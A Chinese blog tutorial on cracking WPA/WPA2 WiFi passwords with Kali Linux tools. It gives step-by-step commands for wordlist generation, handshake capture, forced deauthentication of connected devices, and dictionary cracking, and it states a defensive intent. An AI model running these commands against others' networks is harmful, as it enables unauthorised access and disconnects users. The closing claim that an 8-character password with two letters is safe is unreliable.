您的位置:首页 > 运维架构 > Linux

Kali Linux使用Aircrack破解WiFi密码(wpa/wpa2)

2019-04-30 22:28 323 查看

注意:破解别人WiFi密码是违法的所以我用我自己家WiFi来测试,我们的目的是知道攻击的原理,来防范这种攻击。

设备需求:
安装kali Linux的计算机(不能用vmware虚拟机,虽然台式机可以用但太过麻烦不推荐,笔记本的虚拟机就算了)
支持监控模式的无线网卡,笔记本一般都支持。(这也是我不推荐用虚拟机的原因)
字典文件(这个可以现做现用,在知道一些线索后可以缩小范围,从而减少字典的大小和破解效率)
时间和耐心(这个和自己的字典大小和CPU有关)
如果用的是别的版本Linux可以下载katoolin工具箱这个我在Ubuntu16.04上用过,不过个别功能并不支持,在Ubuntu18.04上
修复了这些问题
×××kali 里自带rockyou字典不过只能破解常见密码这里我不做使用。

1)字典生成。

工欲善其事必先利其器,如果能5分钟破解WiFi的话我宁可4分钟在写字典。
在终端执行:

crunch 8 8 bkrw489 -o ./cs/zd.txy

crunch:生成字典
第一个8 密码起始长度(就是最小位数)小提示:wifi密码最少8位
第二个8 密码结束长度(密码最大位数)
bkrw489 秘密中包含的字符
-o: 用于指定输出字典文件的位置。
./cs/ 文件路径
zd.txy 字典名称

不要妄想把所有小写字母和数字字典写出来,用上面最基本的写法生成出来的字典足足16tb,这只是为了展示这次实验编写的最简易的字典大小只有51.9mb如果设置特殊格式的话可以更小,但是没有必要。

2)开始准备

先断开wifi
在终端输入:

airmon-ng
查看支持无线网卡监控模式的名称

上面列出了支持监控模式的无线网卡(在interface下面)如果没有任何输出表示无线网卡不支持监控模式或者无无线网卡。

3)开启无线网卡的监控模式

在终端输入:

airmon-ng start wlan0

4)查看当前搜索范围的WiFi网络

在终端输入:

airodump-ng wlan0mon

摁Ctrl+c结束搜索

5)抓取握手包

包含密码的包也叫握手包,有新用户链接或者有用户断开链接,或者有用户自动链接WiFi时就会发送握手包
开始抓包在终端运行:

airodump-ng -c XX --bssid XX:XX:XX:XX:XX -w ./cs/ wlan0mon


-c指定频道号
–bissid 制定路由器的bissid
-w将抓取的包保存到指定位置

6)接下来是漫长的等待

也就是说我们要等用户重新链接或者断开我们要破解的wifi,这得看运气了运气不好会等很长一段时间。

7)不用等也可以因为我们还有别的办法

用aireplay-ng工具,他可以强制用户断开WiFi链接。
他的原理是给已经连接到WiFi的用户发送一个反认证包(deauth)让那个设备强行断开wifi,等一会儿后那个设备会自动链接,这样我们就能抓取握手包了。
不过此工具有瓶颈,用它时必须确保那个WiFi链接着至少一个设备。
保留监控终端在新终端运行:

aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0mon


-0表示发起攻击
-a制定无线路由器bssid就是我们要破解WiFi的那个路由器bssid
-c制定强制断开正在连着WiFi的设备
如果成功:右上角会显示
WPA handshake: XX:XX:XX:XX:XX:XX
摁Ctrl+c结束抓包并关闭无线网卡的监控模式
在终端输入:
airmon-ng stop wlan0

8)开始破解密码

在终端输入:

aircrack-ng -a2 -b XX:XX:XX:XX:XX:XX -w ./cs/zd.txy ./cs/*.cap

-a2代表wpa的握手包
-b制定要破解的WiFi bissid
-w制定要破解的字典文件(这里我生成的.txy文件也有.txt文件的格式)
./cs/*.cap这是最后抓取的包我给放在字典所在的文件夹了。

9)等待出结果吧是时候考验cpu真正的实力了


小提示:如果你的kali里面有显卡驱动和一块很好的显卡我建议你用gpu跑字典这样更快快这里暂不做介绍
总结:防止这种攻击简直简单的很如果对方没有做过工程,我可以很明确的告诉你8位密码里掺杂2个英文字母就很安全了,设置贼长贼复杂的密码是防御这种攻击最有效的手段!

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: